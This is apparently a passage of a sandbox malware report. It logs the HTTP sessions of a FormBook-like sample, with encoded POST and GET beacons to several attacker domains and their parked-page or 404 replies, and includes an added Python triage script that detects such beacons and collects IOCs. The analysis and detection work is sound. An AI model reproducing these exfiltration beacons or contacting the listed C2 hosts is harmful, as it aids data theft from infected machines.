                                                                                Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                Set-Cookie: vsid=903vr481726335611487398; expires=Thu, 13-Dec-2029 12:52:15 GMT; Max-Age=157680000; path=/; domain=www.guacamask.online; HttpOnly
                                                                                X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_fEwYFA6UlTPtOt4tkZXeueMIINfcHWLIWRAzmpinWnSckp4XXaqlnxdNyKSLHn/aGHfWPahFOT02Jpobem61wQ==
                                                                                Content-Length: 2620
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Connection: close
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4b 58 37 34 69 78 70 7a 56 79 58 62 4a 70 72 63 4c 66 62 48 34 70 73 50 34 2b 4c 32 65 6e 74 71 72 69 30 6c 7a 68 36 70 6b 41 61 58 4c 50 49 63 63 6c 76 36 44 51 42 65 4a 4a 6a 47 46 57 72 42 49 46 36 51 4d 79 46 77 58 54 35 43 43 52 79 6a 53 32 70 65 6e 45 43 41 77 45 41 41 51 3d 3d 5f 66 45 77 59 46 41 36 55 6c 54 50 74 4f 74 34 74 6b 5a 58 65 75 65 4d 49 49 4e 66 63 48 57 4c 49 57 52 41 7a 6d 70 69 6e 57 6e 53 63 6b 70 34 58 58 61 71 6c 6e 78 64 4e 79 4b 53 4c 48 6e 2f 61 47 48 66 57 50 61 68 46 4f 54 30 32
                                                                                Data Ascii: <!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_fEwYFA6UlTPtOt4tkZXeueMIINfcHWLIWRAzmpinWnSckp4XXaqlnxdNyKSLHn/aGHfWPahFOT02
                                                                                Dec 14, 2024 13:52:15.990881920 CET | 1236 | IN | Data Raw: 4a 70 6f 62 65 6d 36 31 77 51 3d 3d 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 61 62 70 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79
                                                                                Data Ascii: Jpobem61wQ=="><head><script type="text/javascript">var abp;</script><script type="text/javascript" src="http://www.guacamask.online/px.js?ch=1"></script><script type="text/javascript" src="http://www.guacamask.online/px.js?ch=2"></script><
                                                                                Dec 14, 2024 13:52:15.990911961 CET | 1139 | IN | Data Raw: 61 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 57 22 20 6e 61 6d 65 3d 22 65 78 70 69 72 65 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 47 4f 4f 47
                                                                                Data Ascii: a content="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta content="width=


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                33 | 192.168.2.5 | 50042 | 84.32.84.32 | 80 | 6008 | C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 14, 2024 13:52:21.707577944 CET | 746 | OUT | POST /qt4m/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.appsolucao.shop
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 205
                                                                                Connection: close
                                                                                Origin: http://www.appsolucao.shop
                                                                                Referer: http://www.appsolucao.shop/qt4m/
                                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                Data Raw: 4e 56 4b 38 3d 79 62 34 51 47 4f 63 44 6e 57 41 4c 58 47 67 6f 78 67 2f 42 37 54 6e 64 6d 4d 6b 6f 4a 5a 68 44 6a 68 31 63 67 52 4c 6b 65 6e 72 33 63 4a 36 48 6a 6c 48 6e 76 39 61 53 6e 69 6c 74 59 52 4b 41 78 5a 6f 57 47 65 65 4a 72 38 4b 33 6e 2f 6b 48 41 4a 6c 55 41 53 65 74 35 6d 31 6a 46 4e 70 6f 39 6e 71 4e 49 6a 2b 73 55 39 72 63 75 45 4a 57 48 63 6d 4c 54 44 61 44 70 56 34 57 5a 67 6e 35 68 72 63 4d 2f 54 6f 39 41 5a 2f 4f 59 76 52 57 4c 30 4f 6e 56 58 73 67 69 33 71 73 69 4f 50 6c 55 52 43 63 66 6a 46 2f 5a 44 4c 46 45 6d 2b 79 2f 30 2b 4c 2f 64 30 6b 5a 4f 42 69 74 75 33 51 48 55 31 48 44 4e 49 3d
                                                                                Data Ascii: NVK8=yb4QGOcDnWALXGgoxg/B7TndmMkoJZhDjh1cgRLkenr3cJ6HjlHnv9aSniltYRKAxZoWGeeJr8K3n/kHAJlUASet5m1jFNpo9nqNIj+sU9rcuEJWHcmLTDaDpV4WZgn5hrcM/To9AZ/OYvRWL0OnVXsgi3qsiOPlURCcfjF/ZDLFEm+y/0+L/d0kZOBitu3QHU1HDNI=


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                34 | 192.168.2.5 | 50043 | 84.32.84.32 | 80 | 6008 | C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 14, 2024 13:52:24.374974966 CET | 766 | OUT | POST /qt4m/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.appsolucao.shop
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 225
                                                                                Connection: close
                                                                                Origin: http://www.appsolucao.shop
                                                                                Referer: http://www.appsolucao.shop/qt4m/
                                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                Data Raw: 4e 56 4b 38 3d 79 62 34 51 47 4f 63 44 6e 57 41 4c 58 6e 51 6f 69 54 58 42 35 7a 6e 63 34 38 6b 6f 51 4a 68 50 6a 68 4a 63 67 56 36 6a 65 52 54 33 62 73 65 48 69 67 37 6e 73 39 61 53 76 43 6c 6b 58 78 4c 4d 78 5a 6c 6a 47 62 2b 4a 72 38 32 33 6e 2b 30 48 63 71 39 4c 61 69 65 76 2f 6d 31 68 59 39 70 6f 39 6e 71 4e 49 6a 36 56 55 35 48 63 76 33 52 57 47 2b 65 49 51 44 61 41 71 56 34 57 64 67 6d 77 68 72 63 69 2f 57 49 58 41 61 48 4f 59 74 5a 57 4c 6d 6d 67 43 48 73 71 76 58 72 41 70 4e 36 78 54 43 4b 6f 53 56 59 6d 61 51 6e 45 42 51 50 59 6c 57 32 6a 73 39 59 63 4a 64 4a 56 38 65 57 35 64 33 6c 33 64 61 66 2b 36 55 54 73 59 69 4b 63 2b 73 52 6a 62 48 6b 6a 69 33 72 4b
                                                                                Data Ascii: NVK8=yb4QGOcDnWALXnQoiTXB5znc48koQJhPjhJcgV6jeRT3bseHig7ns9aSvClkXxLMxZljGb+Jr823n+0Hcq9Laiev/m1hY9po9nqNIj6VU5Hcv3RWG+eIQDaAqV4Wdgmwhrci/WIXAaHOYtZWLmmgCHsqvXrApN6xTCKoSVYmaQnEBQPYlW2js9YcJdJV8eW5d3l3daf+6UTsYiKc+sRjbHkji3rK


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                35 | 192.168.2.5 | 50044 | 84.32.84.32 | 80 | 6008 | C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 14, 2024 13:52:27.053821087 CET | 1783 | OUT | POST /qt4m/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.appsolucao.shop
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 1241
                                                                                Connection: close
                                                                                Origin: http://www.appsolucao.shop
                                                                                Referer: http://www.appsolucao.shop/qt4m/
                                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                Data Raw: 4e 56 4b 38 3d 79 62 34 51 47 4f 63 44 6e 57 41 4c 58 6e 51 6f 69 54 58 42 35 7a 6e 63 34 38 6b 6f 51 4a 68 50 6a 68 4a 63 67 56 36 6a 65 53 7a 33 62 61 43 48 6a 44 54 6e 74 39 61 53 77 79 6c 68 58 78 4b 57 78 59 4e 34 47 62 37 38 72 35 79 33 6f 38 73 48 51 50 4a 4c 50 79 65 76 79 47 31 69 46 4e 70 78 39 6e 36 4a 49 6a 4b 56 55 35 48 63 76 32 68 57 42 73 6d 49 57 44 61 44 70 56 34 53 5a 67 6d 63 68 72 46 66 2f 57 38 74 63 37 6e 4f 59 4e 70 57 47 7a 36 67 42 6e 73 6b 73 58 72 59 70 4e 6d 48 54 43 6e 58 53 56 45 4d 61 54 48 45 41 6d 57 2f 68 6e 75 4c 33 66 49 6a 4c 65 4e 47 6a 34 66 59 64 6b 35 57 56 62 2f 65 78 57 48 55 57 31 32 41 71 64 6b 7a 61 51 41 6a 7a 68 36 77 73 46 2f 59 2b 74 39 6d 35 2f 6f 49 76 2b 47 6d 74 33 57 49 4b 48 32 6c 46 33 68 52 6b 52 64 61 6c 2f 48 7a 5a 6e 57 77 55 54 57 4c 34 50 57 67 6f 76 78 33 4a 7a 6a 44 6c 34 32 4d 30 39 4f 56 50 66 61 73 46 56 79 70 77 33 6a 51 38 45 6c 71 41 76 34 71 65 79 4b 57 66 6f 47 70 75 7a 4f 53 35 56 30 53 49 6d 55 64 4a 30 54 30 47 4f 41 53 39 [TRUNCATED]
                                                                                Data Ascii: NVK8= [TRUNCATED]


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                36 | 192.168.2.5 | 50045 | 84.32.84.32 | 80 | 6008 | C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 14, 2024 13:52:29.711357117 CET | 484 | OUT | GET /qt4m/?NVK8=/ZQwF7Ip71YCaUlU/jTQ7l2Lp/ZTQN44rx1LzCy9bB7kVb+FnyrErN7h2wh6V0uCxKMxAv7qgoDPyMkbBqZLZiqSzgxnAs9V7XipQDSCcuTG51JuJsWtbCKrsXwQUSP17A==&V6T=lB24KzN0lF-8 HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.appsolucao.shop
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                Dec 14, 2024 13:52:30.801634073 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 14 Dec 2024 12:52:30 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 9973
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Server: hcdn
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                x-hcdn-request-id: 43c39181e52e2e649c3f2f077ef660d6-bos-edge4
                                                                                Expires: Sat, 14 Dec 2024 12:52:29 GMT
                                                                                Cache-Control: no-cache
                                                                                Accept-Ranges: bytes
                                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED]
                                                                                Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"O
                                                                                Dec 14, 2024 13:52:30.801707983 CET | 1236 | IN | Data Raw: 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61 63
                                                                                Data Ascii: pen Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600!
                                                                                Dec 14, 2024 13:52:30.801719904 CET | 1236 | IN | Data Raw: 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 35 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63
                                                                                Data Ascii: ;font-size:13px;padding-left:5px;padding-right:5px}.navbar-nav>li>a:hover{text-decoration:none;color:#cdc3ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-co
                                                                                Dec 14, 2024 13:52:30.801845074 CET | 672 | IN | Data Raw: 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 2d 69 6e 76 65 72 73 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72
                                                                                Data Ascii: :#fff!important}.navbar{border-radius:0!important}.navbar-inverse{background-color:#36344d;border:none}.column-custom-wrap{padding-top:10px 20px}.badge{font-size:12px;line-height:16px;min-height:20px;min-width:20px;vertical-align:middle;text-a
                                                                                Dec 14, 2024 13:52:30.801858902 CET | 1236 | IN | Data Raw: 79 6e 63 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 67 74 61 67 28 29 7b 64 61 74 61 4c 61 79 65 72 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 7d 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 3d 77 69
                                                                                Data Ascii: ync></script><script>function gtag(){dataLayer.push(arguments)}window.dataLayer=window.dataLayer||[],gtag("js",new Date),gtag("config","UA-26575989-44")</script><nav class="navbar navbar-inverse"><div class=container-fluid style="padding:0 32p
                                                                                Dec 14, 2024 13:52:30.801868916 CET | 1236 | IN | Data Raw: 2d 61 63 63 6f 75 6e 74 2d 70 61 67 65 3e 3c 64 69 76 20 63 6c 61 73 73 3d 63 6f 6e 74 61 69 6e 65 72 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 73 2d 31 32 20 74 6f 70 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 64 69 76 20 63 6c 61 73 73
                                                                                Data Ascii: -account-page><div class=container><div class="col-xs-12 top-container"><div class=message><h2 id=pathName><i></i></h2><div class=message-subtitle>Happy to see your domain with Hostinger!</div><p>Your domain is active and is using Hostinger na
                                                                                Dec 14, 2024 13:52:30.802011013 CET | 1236 | IN | Data Raw: 66 6f 6c 6c 6f 77 3e 41 64 64 20 61 20 77 65 62 73 69 74 65 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 73 2d 31 32 20 63 6f 6c 2d 73 6d 2d 34 20 63 6f 6c 75 6d 6e 2d 63 75 73 74 6f 6d 2d 77
                                                                                Data Ascii: follow>Add a website</a></div></div><div class="col-xs-12 col-sm-4 column-custom-wrap"><div class=column-custom><div class=column-title>Change domain nameservers</div><br><p>Manage your domain nameservers in the domain management page of your
                                                                                Dec 14, 2024 13:52:30.802022934 CET | 1236 | IN | Data Raw: 2b 33 38 29 29 7d 74 68 69 73 2e 64 65 63 6f 64 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 61 2c 68 2c 66 2c 69 2c 63 2c 75 2c 64 2c 6c 2c 70 2c 67 2c 73 2c 43 2c 77 2c 76 2c 6d 3d 5b 5d 2c 79 3d 5b 5d 2c 45 3d 65 2e 6c 65 6e 67
                                                                                Data Ascii: +38))}this.decode=function(e,t){var a,h,f,i,c,u,d,l,p,g,s,C,w,v,m=[],y=[],E=e.length;for(a=128,f=0,i=72,(c=e.lastIndexOf("-"))<0&&(c=0),u=0;u<c;++u){if(t&&(y[m.length]=e.charCodeAt(u)-65<26),128<=e.charCodeAt(u))throw new RangeError("Illegal i
                                                                                Dec 14, 2024 13:52:30.802196980 CET | 988 | IN | Data Raw: 28 6d 2d 3d 28 6d 2d 39 37 3c 32 36 29 3c 3c 35 29 2b 28 28 21 77 5b 64 5d 26 26 6d 2d 36 35 3c 32 36 29 3c 3c 35 29 29 3a 74 5b 64 5d 29 29 3b 66 6f 72 28 69 3d 63 3d 79 2e 6c 65 6e 67 74 68 2c 30 3c 63 26 26 79 2e 70 75 73 68 28 22 2d 22 29 3b
                                                                                Data Ascii: (m-=(m-97<26)<<5)+((!w[d]&&m-65<26)<<5)):t[d]));for(i=c=y.length,0<c&&y.push("-");i<v;){for(l=r,d=0;d<v;++d)h<=(C=t[d])&&C<l&&(l=C);if(l-h>Math.floor((r-f)/(i+1)))throw RangeError("punycode_overflow (1)");for(f+=(l-h)*(i+1),h=l,d=0;d<v;++d){if

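The sessions above all share one shape: the same 2011-era Chrome 11 User-Agent on every request, a POST of a single opaque form field (NVK8) to a short directory path (/v2ut/, /qt4m/) whose Origin and Referer point back at that same path, then a GET on the same path carrying NVK8 plus a second parameter (V6T). Neither www.guacamask.online nor www.appsolucao.shop answers with anything but a generic landing page or a Hostinger "Parked Domain" page, which is the usual picture with FormBook: the bot walks a list of mostly decoy domains and only one of them is the live C2, and the report does not say which. The following triage script is an added example for this page, not code from the Joe Sandbox report or from the sample; it reconstructs requests from the headers shown above (bodies shortened, so the inputs are constructed), scores each request against those traits, flags responses that cannot be C2 traffic, and collects host/path IOCs. The function names are this example's own.

```python
"""Triage helper for the FormBook-style HTTP beacons captured above.

Added example; not part of the Joe Sandbox report or the sample. Requests
below are constructed from the headers shown in the sessions (bodies
shortened). Function and class names are this example's own.
"""
import re
from dataclasses import dataclass, field
from urllib.parse import parse_qsl, urlsplit

# User-Agent carried verbatim by every request in the capture: a Chrome 11
# build on Windows 7 that no real browser sends today.
FORMBOOK_UA = ("Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 "
               "(KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20")
# Beacon paths in the capture are one short directory: /v2ut/, /qt4m/, /2pcx/
PATH_RE = re.compile(r"^/[a-z0-9]{4}/$")


@dataclass
class Beacon:
    method: str
    host: str
    path: str
    params: list                      # parameter names seen (NVK8, V6T above)
    reasons: list = field(default_factory=list)


def parse_request(raw: str):
    """Split a raw HTTP/1.1 request into (method, target, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body


def classify(raw: str):
    """Return a Beacon when at least three independent traits match, else None.

    Requiring three traits keeps one coincidental header (an odd UA on its
    own, a four-character path on its own) from raising an alert.
    """
    method, target, headers, body = parse_request(raw)
    url = urlsplit(target)
    host = headers.get("host", "")
    reasons = []
    if headers.get("user-agent") == FORMBOOK_UA:
        reasons.append("legacy Chrome/11 User-Agent")
    if PATH_RE.match(url.path):
        reasons.append("short directory-only path")
    if method == "POST":
        params = [k for k, _ in parse_qsl(body, keep_blank_values=True)]
        if (headers.get("content-type") == "application/x-www-form-urlencoded"
                and len(params) == 1):
            reasons.append("single opaque form field")
        # Origin/Referer claim the form was submitted from the beacon URL itself
        if headers.get("referer") == f"http://{host}{url.path}":
            reasons.append("self-referencing Referer")
    else:
        params = [k for k, _ in parse_qsl(url.query, keep_blank_values=True)]
        if len(params) == 2:
            reasons.append("two opaque query parameters on GET")
    return Beacon(method, host, url.path, params, reasons) if len(reasons) >= 3 else None


def looks_like_decoy(status_line: str, body: str) -> bool:
    """True when a GET beacon got an error or a parked page instead of C2 data."""
    code = int(status_line.split(" ", 2)[1])
    return code != 200 or "Parked Domain" in body or "data-adblockkey" in body


def iocs(requests):
    """Map each beacon host to the set of paths it was contacted on."""
    out = {}
    for raw in requests:
        b = classify(raw)
        if b:
            out.setdefault(b.host, set()).add(b.path)
    return out


def _req(method, target, host, body="", extra=()):
    """Build a raw request with the headers the sample sends (constructed input)."""
    lines = [f"{method} {target} HTTP/1.1", f"Host: {host}",
             f"User-Agent: {FORMBOOK_UA}", "Connection: close", *extra]
    return "\r\n".join(lines) + "\r\n\r\n" + body


# Constructed from sessions 30 and 36 above; the NVK8 values are shortened.
POST_BEACON = _req("POST", "/v2ut/", "www.guacamask.online",
                   body="NVK8=cwNQIXCQp2K9slZZvxa/1CsIb+Br0+NV7gwdtqO/BJWYHKIN0bGVwb6bb4=",
                   extra=("Content-Type: application/x-www-form-urlencoded",
                          "Origin: http://www.guacamask.online",
                          "Referer: http://www.guacamask.online/v2ut/"))
GET_BEACON = _req("GET", "/qt4m/?NVK8=/ZQwF7Ip71YCaUlU/jTQ7l2Lp/ZTQN44rx1LzCy9bB7k==&V6T=lB24KzN0lF-8",
                  "www.appsolucao.shop")
BENIGN = "GET /index.html HTTP/1.1\r\nHost: example.com\r\nUser-Agent: curl/8.5.0\r\n\r\n"

if __name__ == "__main__":
    for raw in (POST_BEACON, GET_BEACON, BENIGN):
        print(classify(raw))
    print(iocs([POST_BEACON, GET_BEACON, BENIGN]))
```

The decoy test is deliberately one-sided: a 404 or a parked page rules a host out as the live C2 for this run, but a 200 with unfamiliar content does not rule it in, so every host that receives a beacon still belongs on the block list.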

                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                37 | 192.168.2.5 | 50046 | 104.21.77.71 | 80 | 6008 | C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 14, 2024 13:52:36.297832966 CET | 755 | OUT | POST /2pcx/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.aziziyeescortg.xyz
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 205
                                                                                Connection: close
                                                                                Origin: http://www.aziziyeescortg.xyz
                                                                                Referer: http://www.aziziyeescortg.xyz/2pcx/
                                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                Data Raw: 4e 56 4b 38 3d 62 74 6b 51 4c 7a 67 4b 38 31 50 43 51 48 74 4e 33 38 6d 4d 62 73 41 36 7a 63 42 55 6d 38 33 47 58 75 34 76 5a 74 37 4f 38 33 30 31 54 37 55 6e 69 37 51 41 71 6c 38 36 42 33 43 31 6a 2f 31 6d 68 4f 39 73 47 4d 78 43 4d 41 4f 43 69 2f 42 54 52 48 77 4f 6a 5a 66 77 52 6d 4d 70 6c 58 6c 72 47 75 35 59 69 6c 4e 6e 4e 50 2f 48 42 45 65 67 2f 2b 45 39 35 66 48 38 70 37 73 67 36 6e 6e 62 51 31 54 47 6a 4c 4d 41 6d 79 35 53 4d 70 6a 76 62 52 65 57 6c 74 77 2f 32 6c 70 47 55 59 58 52 51 4e 44 76 32 70 76 46 32 42 76 67 62 43 52 64 48 53 50 79 50 43 77 55 4b 44 72 4b 67 44 41 51 79 46 37 49 78 32 30 3d
                                                                                Data Ascii: NVK8=btkQLzgK81PCQHtN38mMbsA6zcBUm83GXu4vZt7O8301T7Uni7QAql86B3C1j/1mhO9sGMxCMAOCi/BTRHwOjZfwRmMplXlrGu5YilNnNP/HBEeg/+E95fH8p7sg6nnbQ1TGjLMAmy5SMpjvbReWltw/2lpGUYXRQNDv2pvF2BvgbCRdHSPyPCwUKDrKgDAQyF7Ix20=
                                                                                 Dec 14, 2024 13:52:37.562068939 CET | 1236              | IN        | HTTP/1.1 404 Not Found
                                                                                Date: Sat, 14 Dec 2024 12:52:37 GMT
                                                                                Content-Type: text/html
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                Pragma: no-cache
                                                                                CF-Cache-Status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ha9DQOfp5C7NH0AQiLSigswdBUpueIuDV2Lk8mdy58rGmre%2Blp3%2BUyVgnGnTRM6szHLHF7Bqzu5dwsv1Dzoxey%2BNEYFzhfv%2BOzzy8zxrIa9FokncBRthqreJPx2PWDuKakCId0mHBkzL"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8f1e5504ac0943d6-EWR
                                                                                Content-Encoding: gzip
